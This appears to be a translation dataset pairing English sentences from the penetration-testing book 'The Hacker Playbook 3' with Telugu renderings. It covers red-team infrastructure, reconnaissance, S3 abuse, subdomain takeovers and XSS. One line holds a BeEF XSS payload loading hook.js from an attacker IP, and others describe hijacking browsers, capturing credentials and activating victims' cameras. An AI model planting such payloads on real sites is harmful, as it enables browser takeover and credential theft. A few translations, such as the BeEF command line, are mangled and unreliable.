Cyber-Parallel-Dataset-Indic / te /The Hacker Playbook 3 Practical Guide To Penetration Testing_indic_translation.jsonl
| {"en":"The book is about penetration testing.","translation":"పుస్తకం చొరబాటు పరీక్ష గురించి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"This edition focuses on Red Team techniques.","translation":"ఈ ఎడిషన్ రెడ్ టీమ్ పద్ధతులపై దృష్టి పెడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The author discusses various attack methods.","translation":"రచయిత వివిధ దాడి పద్ధతుల గురించి చర్చిస్తాడు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"He covers topics like web application exploitation.","translation":"అతను వెబ్ అప్లికేషన్ దోపిడీ వంటి అంశాలను కవర్ చేస్తాడు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book also includes social engineering examples.","translation":"పుస్తకంలో సామాజిక ఇంజనీరింగ్ ఉదాహరణలు కూడా ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Physical attacks and evasion techniques are explained.","translation":"భౌతిక దాడులు మరియు తప్పించుకునే పద్ధతులు వివరించబడ్డాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The author emphasizes the importance of security.","translation":"రచయిత భద్రత యొక్క ప్రాముఖ్యతను నొక్కిచెప్పారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Readers are encouraged to build their own labs.","translation":"రీడర్లను వారి స్వంత ల్యాబ్లను నిర్మించమని ప్రోత్సహిస్తారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book provides practical guidance.","translation":"పుస్తకం ఆచరణాత్మక మార్గదర్శకత్వాన్ని అందిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"It helps readers understand attacker mindsets.","translation":"ఇది పాఠకులకు దాడి చేసేవారి మనస్తత్వాన్ని అర్థం చేసుకోవడానికి సహాయపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The content is suitable for security professionals.","translation":"ఈ కంటెంట్ భద్రతా నిపుణులకు అనుకూలంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book covers advanced topics in detail.","translation":"పుస్తకం అధునాతన అంశాలను వివరంగా కవర్ చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"It also includes information on evading detection.","translation":"గుర్తించకుండా తప్పించుకోవడం గురించి కూడా సమాచారం ఉంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"The author shares real-world experiences.","translation":"రచయిత వాస్తవ-ప్రపంచ అనుభవాలను పంచుకుంటాడు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book aims to improve security posture.","translation":"పుస్తకం భద్రతా భంగిమను మెరుగుపరచడం లక్ష్యంగా పెట్టుకుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"It is a valuable resource for penetration testers.","translation":"ఇది చొరబాటు పరీక్షకులకు విలువైన వనరు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book discusses the importance of Red Teams.","translation":"పుస్తకం రెడ్ టీమ్ల ప్రాముఖ్యతను చర్చిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"It provides insights into offensive security.","translation":"ఇది దూకుడు భద్రతపై అంతర్దృష్టులను అందిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The book is well-structured and easy to follow.","translation":"పుస్తకం బాగా నిర్మాణాత్మకంగా ఉంది మరియు అనుసరించడం సులభం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"It is a comprehensive guide to penetration testing.","translation":"ఇది చొరబాటు పరీక్షకు సమగ్రమైన మార్గదర్శి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"The client wants you to use?","translation":"క్లయింట్ మీరు ఉపయోగించాలనుకుంటున్నారా?","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Will it be COTS offensive tools like Metasploit, Cobalt Strike, DNS Cat?","translation":"ఇది మెటాస్ప్లోయిట్, కోబాల్ట్ స్ట్రైక్, DNS క్యాట్ వంటి COTS దాడి సాధనాలు అవుతుందా?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Or custom tools?","translation":"లేదా అనుకూల సాధనాలు?","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The best part is that getting caught is part of the assessment.","translation":"అత్యుత్తమ భాగం ఏమిటంటే, పట్టుబడటం అనేది అంచనాలో భాగం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"There are some campaigns where we get caught 4 or 5 times and have to burn 4 or 5 different environments.","translation":"కొన్ని ప్రచారాలు ఉన్నాయి, ఇక్కడ మేము 4 లేదా 5 సార్లు పట్టుబడతాము మరియు 4 లేదా 5 వేర్వేరు పరిసరాలను కాల్చవలసి ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"This really shows to your client that their defenses are working (or not working) based on what results they expected.","translation":"మీ క్లయింట్ వారి రక్షణలు వారు expected ఫలితాల ఆధారంగా పనిచేస్తున్నాయని (లేదా పని చేయకపోవడం) ఇది నిజంగా చూపిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"At the end of the book, I will provide some reporting examples of how we capture metrics and report that data.","translation":"పుస్తకం చివరిలో, మేము మెట్రిక్లను ఎలా సంగ్రహిస్తాము మరియు ఆ డేటాను ఎలా నివేదిస్తాము అనేదానికి సంబంధించిన కొన్ని నివేదిక ఉదాహరణలను నేను అందిస్తాను.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Setting Up Your External Servers","translation":"మీ బాహ్య సర్వర్లను ఏర్పాటు చేయడం","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"In today's world with the abundance of Virtual Private Servers (VPS), standing up your attacker machines on the internet won't break your budget.","translation":"నేటి ప్రపంచంలో వర్చువల్ ప్రైవేట్ సర్వర్ల (VPS) సమృద్ధిగా ఉండటంతో, ఇంటర్నెట్లో మీ దాడి యంత్రాలను నిలబెట్టడం మీ బడ్జెట్ను విచ్ఛిన్నం చేయదు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"For example, I commonly use Digital Ocean Droplets or Amazon Web Services (AWS) Lightsail servers to configure my VPS servers.","translation":"ఉదాహరణకు, నేను సాధారణంగా నా VPS సర్వర్లను కాన్ఫిగర్ చేయడానికి డిజిటల్ ఓషన్ డ్రాప్లెట్స్ లేదా అమెజాన్ వెబ్ సర్వీసెస్ (AWS) లైట్సేల్ సర్వర్లను ఉపయోగిస్తాను.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The reasons I use these services are because they are generally very low cost (sometimes free), allow for Ubuntu servers, allow for servers in all sorts of regions, and most importantly, are very easy to set up.","translation":"నేను ఈ సేవలను ఉపయోగించడానికి కారణం ఏమిటంటే, అవి సాధారణంగా చాలా తక్కువ ఖర్చుతో కూడుకున్నవి (కొన్నిసార్లు ఉచితం), ఉబుంటు సర్వర్లను అనుమతిస్తాయి, అన్ని రకాల ప్రాంతాలలో సర్వర్లను అనుమతిస్తాయి మరియు ముఖ్యంగా, సెటప్ చేయడం చాలా సులభం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Within minutes, you can have multiple servers set up and running Metasploit and Empire services.","translation":"నిమిషాల్లో, మీరు బహుళ సర్వర్లను ఏర్పాటు చేసి, మెటాస్ప్లోయిట్ మరియు ఎంపైర్ సేవలను అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"I am going to focus on AWS Lightsail servers in this book, due to the ease in setting up, ability to automate services, and the amount of traffic normally going to AWS.","translation":"సెటప్ చేయడంలో సౌలభ్యం, సేవలను ఆటోమేట్ చేసే సామర్థ్యం మరియు సాధారణంగా AWSకి వెళ్లే ట్రాఫిక్ పరిమాణం కారణంగా నేను ఈ పుస్తకంలో AWS లైట్సేల్ సర్వర్లపై దృష్టి పెట్టబోతున్నాను.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"After you have fully created an image you like, you can rapidly clone that image to multiple servers, which makes it extremely easy to build ready-made Command and Control boxes.","translation":"మీకు నచ్చిన చిత్రాన్ని పూర్తిగా సృష్టించిన తర్వాత, మీరు ఆ చిత్రాన్ని బహుళ సర్వర్లకు త్వరగా క్లోన్ చేయవచ్చు, ఇది రెడీమేడ్ కమాండ్ మరియు కంట్రోల్ బాక్స్లను నిర్మించడం చాలా సులభం చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Again, you should make sure you abide by the VPS provider's service terms so you do not fall into any problems.","translation":"మళ్ళీ, మీరు VPS ప్రొవైడర్ యొక్క సేవా నిబంధనలకు కట్టుబడి ఉన్నారని నిర్ధారించుకోవాలి, తద్వారా మీరు ఎటువంటి సమస్యల్లో పడకుండా ఉంటారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Create an Instance","translation":"ఒక ఉదాహరణను సృష్టించండి","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"I highly recommend getting at least 1 GB of RAM","translation":"కనీసం 1 GB RAM పొందమని నేను సిఫార్సు చేస్తున్నాను.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Storage space usually isn't an issue","translation":"నిల్వ స్థలం సాధారణంగా సమస్య కాదు","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Linux/Unix OS Only -> Ubuntu","translation":"Linux/Unix OS మాత్రమే -> Ubuntu","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Download Cert","translation":"సర్టిఫికెట్ డౌన్లోడ్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You can use it to perform modern attacks within Active Directory environments.","translation":"మీరు దీన్ని యాక్టివ్ డైరెక్టరీ పరిసరాలలో ఆధునిక దాడులను నిర్వహించడానికి ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Pupy is an opensource, cross-platform remote administration and post-exploitation tool.","translation":"ప్యూపీ అనేది ఓపెన్ సోర్స్, క్రాస్-ప్లాట్ఫారమ్ రిమోట్ అడ్మినిస్ట్రేషన్ మరియు పోస్ట్-ఎక్స్ప్లోయిటేషన్ సాధనం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One of the awesome features of Pupy is that you can run Python across all of your agents.","translation":"ప్యూపీ యొక్క అద్భుతమైన లక్షణాలలో ఒకటి ఏమిటంటే మీరు మీ అన్ని ఏజెంట్లలో పైథాన్ను అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"PoshC2 is a proxy aware C2 framework written completely in PowerShell.","translation":"పోష్C2 అనేది ప్రాక్సీని గుర్తించే C2 ఫ్రేమ్వర్క్, ఇది పూర్తిగా పవర్షెల్లో వ్రాయబడింది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Merlin takes advantage of a recently developed protocol called HTTP/2.","translation":"మెర్లిన్ ఇటీవల అభివృద్ధి చేయబడిన HTTP/2 అనే ప్రోటోకాల్ను ఉపయోగిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Merlin is a tool written in GO, looks and feels similar to PowerShell Empire.","translation":"మెర్లిన్ అనేది GOలో వ్రాయబడిన ఒక సాధనం, ఇది పవర్షెల్ ఎంపైర్ను పోలి ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Nishang is useful during all phases of penetration testing.","translation":"నిశాంక్ చొచ్చుకుపోయే పరీక్ష యొక్క అన్ని దశలలో ఉపయోగపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Being ready for any scenario will help you get around any obstacle.","translation":"ఏదైనా దృశ్యానికి సిద్ధంగా ఉండటం వలన మీరు ఏ అడ్డంకినైనా అధిగమించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We are going to continue this tradition and expand on the reconnaissance phase.","translation":"మేము ఈ సంప్రదాయాన్ని కొనసాగిస్తాము మరియు నిఘా దశను విస్తరిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"These activities allow you to gather more information about the victim’s infrastructure.","translation":"ఈ కార్యకలాపాలు బాధితుడి మౌలిక సదుపాయాల గురించి మరింత సమాచారాన్ని సేకరించడానికి మిమ్మల్ని అనుమతిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"For client networks that are generally not too large, we set up simple cronjob to perform external port diffing.","translation":"సాధారణంగా పెద్దవి కాని క్లయింట్ నెట్వర్క్ల కోసం, మేము బాహ్య పోర్ట్ డిఫింగ్ను నిర్వహించడానికి సాధారణ క్రోన్జాబ్ను ఏర్పాటు చేస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"The one issue we have seen is with Masscan's reliability when scanning large ranges.","translation":"మేము చూసిన ఒక సమస్య ఏమిటంటే పెద్ద పరిధులను స్కాన్ చేసేటప్పుడు మాస్స్కాన్ యొక్క విశ్వసనీయత.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"I highly recommend you spend the time to make our tools better and share it with the community.","translation":"మీరు మా సాధనాలను మెరుగుపరచడానికి మరియు సంఘంతో పంచుకోవడానికి సమయాన్ని వెచ్చించాలని నేను సిఫార్సు చేస్తున్నాను.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The reason HTTPScreenshot is so powerful is that it uses Masscan to scan large networks quickly.","translation":"HTTPScreenshot చాలా శక్తివంతంగా ఉండటానికి కారణం ఏమిటంటే, ఇది పెద్ద నెట్వర్క్లను త్వరగా స్కాన్ చేయడానికి మాస్స్కాన్ను ఉపయోగిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Eyewitness is another great tool that takes an XML file from nmap output and screenshots webpages.","translation":"ఐవిట్నెస్ అనేది మరొక గొప్ప సాధనం, ఇది nmap అవుట్పుట్ నుండి XML ఫైల్ను తీసుకుంటుంది మరియు వెబ్పేజీలను స్క్రీన్షాట్ చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"As more and more companies switch over to using different cloud infrastructures, a lot of new and old attacks come to light.","translation":"ఎక్కువ కంపెనీలు వివిధ క్లౌడ్ మౌలిక సదుపాయాలను ఉపయోగించడం వైపు మారుతున్న కొద్దీ, చాలా కొత్త మరియు పాత దాడులు వెలుగులోకి వస్తాయి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"For Red Teamers, a problem is how do we search on different cloud environments?","translation":"రెడ్ టీమర్లకు, సమస్య ఏమిటంటే, మనం వివిధ క్లౌడ్ పరిసరాలలో ఎలా శోధించాలి?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Shodan is a great service that regularly scans the internet, grabbing banners, ports, information about networks, and more.","translation":"షోడాన్ అనేది ఒక గొప్ప సేవ, ఇది క్రమం తప్పకుండా ఇంటర్నెట్ను స్కాన్ చేస్తుంది, బ్యానర్లు, పోర్ట్లు, నెట్వర్క్ల గురించి సమాచారం మరియు మరిన్నింటిని పొందుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One of the best features of Censys is that it scrapes information from SSL certificates.","translation":"సెన్సస్ యొక్క ఉత్తమ లక్షణాలలో ఒకటి ఏమిటంటే, ఇది SSL సర్టిఫికేట్ల నుండి సమాచారాన్ని సేకరిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can take the list of IP ranges for our cloud providers and scan all of them regularly to pull down SSL certificates.","translation":"మేము మా క్లౌడ్ ప్రొవైడర్ల కోసం IP శ్రేణుల జాబితాను తీసుకోవచ్చు మరియు SSL సర్టిఫికేట్లను డౌన్లోడ్ చేయడానికి వాటినన్నింటినీ క్రమం తప్పకుండా స్కాన్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"If we have write access, it could allow complete RCE of their applications.","translation":"మనకు వ్రాత యాక్సెస్ ఉంటే, అది వారి అప్లికేషన్ల పూర్తి RCEని అనుమతించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We have often seen that when files stored on S3 buckets are used on all of their pages, we can put our malicious code on their web application servers.","translation":"S3 బకెట్లలో నిల్వ చేయబడిన ఫైల్లను వారి అన్ని పేజీలలో ఉపయోగించినప్పుడు, మేము మా హానికర కోడ్ను వారి వెబ్ అప్లికేషన్ సర్వర్లలో ఉంచవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Writing to S3: echo \"test\" > test.txt aws s3 mv test.txt s3://cyberspacekittens aws s3 ls s3://cyberspacekittens","translation":"S3కి వ్రాయడం: echo \"test\" > test.txt aws s3 mv test.txt s3://cyberspacekittens aws s3 ls s3://cyberspacekittens","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"If we did have write access, we could use the put-object in s3api to modify that file.","translation":"ఒకవేళ మనకు వ్రాత యాక్సెస్ ఉంటే, ఆ ఫైల్ను సవరించడానికి మనం s3apiలో పుట్-ఆబ్జెక్ట్ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Subdomain takeovers are a common vulnerability we see with almost every company these days.","translation":"సబ్డొమైన్ టేక్ఓవర్లు ఈ రోజుల్లో దాదాపు ప్రతి కంపెనీలోనూ మనం చూసే సాధారణ బలహీనత.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"If they ever forget to configure the third party service or deregister from that server, an attacker can take over that hostname with the third party.","translation":"ఒకవేళ వారు మూడవ పక్ష సేవను కాన్ఫిగర్ చేయడం లేదా ఆ సర్వర్ నుండి డీరెజిస్టర్ చేయడం మరచిపోతే, ఒక దాడి చేసే వ్యక్తి మూడవ పక్షంతో ఆ హోస్ట్పేరును స్వాధీనం చేసుకోవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Someone can now go to AWS and set up testlab.s3.amazon.com and have a valid S3 bucket on the victim’s domain.","translation":"ఇప్పుడు ఎవరైనా AWSకి వెళ్లి testlab.s3.amazon.comని సెటప్ చేసి, బాధితుడి డొమైన్లో చెల్లుబాటు అయ్యే S3 బకెట్ను కలిగి ఉండవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One tool to check for vulnerable subdomains is called tko-subs.","translation":"బలహీనమైన సబ్డొమైన్లను తనిఖీ చేయడానికి ఒక సాధనం tko-subs అని పిలువబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"We can use this tool to check whether any of the subdomains we have found pointing to a CMS provider can be taken over.","translation":"CMS ప్రొవైడర్కు పాయింట్ చేస్తున్న మేము కనుగొన్న సబ్డొమైన్లలో దేనినైనా స్వాధీనం చేసుకోవచ్చో లేదో తనిఖీ చేయడానికి మేము ఈ సాధనాన్ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"A huge part of any social engineering attack is to find email addresses and names of employees.","translation":"ఏదైనా సోషల్ ఇంజనీరింగ్ దాడిలో ఉద్యోగుల ఇమెయిల్ చిరునామాలు మరియు పేర్లను కనుగొనడం ఒక ముఖ్యమైన భాగం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Once you get a small list of emails, it is good to understand their email format.","translation":"మీకు చిన్న ఇమెయిల్ జాబితా వచ్చిన తర్వాత, వారి ఇమెయిల్ ఫార్మాట్ను అర్థం చేసుకోవడం మంచిది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"We all know that spear phishing is still one of the more successful avenues of attack.","translation":"స్పియర్ ఫిషింగ్ ఇప్పటికీ దాడి చేయడానికి మరింత విజయవంతమైన మార్గాలలో ఒకటి అని మనందరికీ తెలుసు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"To build a good list of email addresses, we can use a tool like SimplyEmail.","translation":"మంచి ఇమెయిల్ చిరునామాల జాబితాను రూపొందించడానికి, మేము SimplyEmail వంటి సాధనాన్ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"This may take a long time to run as it checks Bing, Yahoo, Google, Ask Search, PGP Repos, files, and much more.","translation":"ఇది బింగ్, యాహూ, గూగుల్, ఆస్క్ సెర్చ్, PGP రెపోస్, ఫైల్లు మరియు మరెన్నో తనిఖీ చేసినందున అమలు చేయడానికి చాలా సమయం పట్టవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One of the best ways to get email accounts is to continually monitor and capture past breaches.","translation":"ఇమెయిల్ ఖాతాలను పొందడానికి ఉత్తమ మార్గాలలో ఒకటి ఏమిటంటే, గత ఉల్లంఘనలను నిరంతరం పర్యవేక్షించడం మరియు సంగ్రహించడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter we went over all the different reconnaissance tactics and tools of the trade.","translation":"ఈ అధ్యాయంలో మేము వివిధ రకాల నిఘా వ్యూహాలు మరియు వాణిజ్య సాధనాల గురించి చర్చించాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"There is no doubt we will continue to see many other severe breaches from public internet facing end-points.","translation":"ప్రజా ఇంటర్నెట్ ఎదుర్కొంటున్న ఎండ్-పాయింట్ల నుండి మనం అనేక ఇతర తీవ్రమైన ఉల్లంఘనలను చూస్తూనే ఉంటామని సందేహం లేదు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The security industry, as a whole, runs in a cyclical pattern.","translation":"భద్రతా పరిశ్రమ, మొత్తంమీద, ఒక వృత్తాకార నమూనాలో నడుస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Since this book is geared more toward Red Teaming concepts, we will not go too deeply into all of the different web vulnerabilities or how to manually exploit them.","translation":"ఈ పుస్తకం రెడ్ టీమింగ్ భావనల వైపు మొగ్గు చూపుతున్నందున, మేము వివిధ వెబ్ బలహీనతలను లేదా వాటిని ఎలా మాన్యువల్గా ఉపయోగించాలో లోతుగా పరిశోధించము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"My best recommendation is to do it against real, live systems.","translation":"నా ఉత్తమ సిఫార్సు ఏమిటంటే, దీన్ని నిజమైన, ప్రత్యక్ష వ్యవస్థలకు వ్యతిరేకంగా చేయండి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Try the different entity attacks and obfuscated payloads.","translation":"వివిధ ఎంటిటీ దాడులను మరియు అస్పష్టమైన పేలోడ్లను ప్రయత్నించండి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"This is a great document that breaks down different XSS payloads based on where your input is served.","translation":"మీ ఇన్పుట్ ఎక్కడ అందించబడుతుందో దాని ఆధారంగా వివిధ XSS పేలోడ్లను విచ్ఛిన్నం చేసే గొప్ప పత్రం ఇది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Another great resource that discusses which browsers are vulnerable to which XSS payloads is: https://html5sec.org/.","translation":"ఏ బ్రౌజర్లు ఏ XSS పేలోడ్లకు గురవుతాయో చర్చించే మరొక గొప్ప వనరు: https://html5sec.org/.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Trying to find that initial XSS pop-up can take a long time.","translation":"ఆ ప్రారంభ XSS పాప్-అప్ను కనుగొనడానికి చాలా సమయం పట్టవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"What if we could try and chain multiple payloads into a single request?","translation":"ఒకే అభ్యర్థనలో బహుళ పేలోడ్లను ప్రయత్నించడానికి మరియు గొలుసు చేయడానికి మనం ప్రయత్నిస్తే ఏమిటి?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"This last type of payload is called a Polyglot.","translation":"ఈ చివరి రకం పేలోడ్ను పాలిగ్లాట్ అంటారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"A Polyglot payload takes many different types of payload/obfuscation techniques and compiles them into one attack.","translation":"ఒక పాలిగ్లాట్ పేలోడ్ అనేక రకాల పేలోడ్/అస్పష్టత పద్ధతులను తీసుకుంటుంది మరియు వాటిని ఒక దాడిగా సంకలనం చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"These types of attacks make Polyglots extremely effective and efficient at identifying XSS.","translation":"ఈ రకమైన దాడులు XSSని గుర్తించడంలో పాలిగ్లాట్లను అత్యంత ప్రభావవంతంగా మరియు సమర్థవంతంగా చేస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"If you want to test and play around with the different polyglots, you can start here on the vulnerable XSS pages (http://chat:3000/xss) or throughout the Chat Application.","translation":"మీరు వివిధ పాలిగ్లాట్లతో పరీక్షించాలనుకుంటే మరియు ఆడాలనుకుంటే, మీరు ఇక్కడ బలహీనమైన XSS పేజీలలో (http://chat:3000/xss) లేదా చాట్ అప్లికేషన్ అంతటా ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"BeEF Browser Exploitation Framework (http://beefproject.com/) or BeEF, takes XSS to another level.","translation":"BeEF బ్రౌజర్ ఎక్స్ప్లోయిటేషన్ ఫ్రేమ్వర్క్ (http://beefproject.com/) లేదా BeEF, XSSని మరొక స్థాయికి తీసుకువెళుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"This tool injects a JavaScript payload onto the victim’s browser, which infects the user’s system.","translation":"ఈ సాధనం బాధితుడి బ్రౌజర్లోకి జావాస్క్రిప్ట్ పేలోడ్ను ఇంజెక్ట్ చేస్తుంది, ఇది వినియోగదారు సిస్టమ్ను ప్రభావితం చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"From a Red Team perspective, BeEF is a great tool to use on campaigns, track users, capture credentials, perform clickjacking, attack with tabnapping and more.","translation":"రెడ్ టీమ్ దృక్కోణం నుండి, ప్రచారాలపై ఉపయోగించడానికి, వినియోగదారులను ట్రాక్ చేయడానికి, ఆధారాలను సంగ్రహించడానికి, క్లిక్జాకింగ్ చేయడానికి, టాబ్నాపింగ్తో దాడి చేయడానికి మరియు మరిన్నింటి కోసం BeEF ఒక గొప్ప సాధనం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"To start the server: Start BeEF on Your Attacker Kali Host From a Terminal beef-xss Authenticate with beef:beef View http://127.0.0.1:3000/hook.js","translation":"సర్వర్ను ప్రారంభించడానికి: మీ అటాకర్ కాలి హోస్ట్పై టెర్మినల్ బీఫ్-ఎక్స్ఎస్ఎస్ నుండి బీఫ్ను ప్రారంభించండి:బీఫ్ http://127.0.0.1:3000/hook.jsని చూడండి","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Viewing your hook.js file located on http://127.0.0.1:3000/hook.js, you should see something that resembles a long-obfuscated JavaScript file.","translation":"http://127.0.0.1:3000/hook.jsలో ఉన్న మీ hook.js ఫైల్ను చూస్తే, మీరు చాలా అస్పష్టమైన జావాస్క్రిప్ట్ ఫైల్ను పోలి ఉండేదాన్ని చూడాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Once you have identified an XSS on your target application, instead of the original alert(1) style payload, you would modify the <script src=\"http://<Your IP>:3000/hook.js\"></script> payload to exploit the vulnerability.","translation":"మీ లక్ష్య అప్లికేషన్లో మీరు XSSని గుర్తించిన తర్వాత, అసలు alert(1) శైలి పేలోడ్కు బదులుగా, మీరు <script src=\"http://<Your IP>:3000/hook.js\"></script> పేలోడ్ను బలహీనతను ఉపయోగించుకోవడానికి సవరిస్తారు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Once your victim falls for this XSS trap, it will cause their browser to connect back to you and be a part of your Zombie network.","translation":"మీ బాధితుడు ఈ XSS ఉచ్చులో పడిన తర్వాత, అది వారి బ్రౌజర్ మిమ్మల్ని తిరిగి కనెక్ట్ చేయడానికి మరియు మీ జాంబీ నెట్వర్క్లో భాగంగా ఉండటానికి కారణమవుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"What types of post exploitation attacks does BeEF support?","translation":"BeEF ఏ రకమైన పోస్ట్ ఎక్స్ప్లోయిటేషన్ దాడులకు మద్దతు ఇస్తుంది?","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You can turn on their camera via HTLM5 and take a picture of your victim, you can push overlays on their screen to capture credentials, or you can redirect them to a malicious site to execute malware.","translation":"మీరు HTLM5 ద్వారా వారి కెమెరాను ఆన్ చేయవచ్చు మరియు మీ బాధితుడి చిత్రాన్ని తీయవచ్చు, మీరు ఆధారాలను సంగ్రహించడానికి వారి స్క్రీన్పై ఓవర్లేలను నెట్టవచ్చు లేదా మాల్వేర్ను అమలు చేయడానికి మీరు వారిని ఒక హానికరమైన సైట్కు మళ్లించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
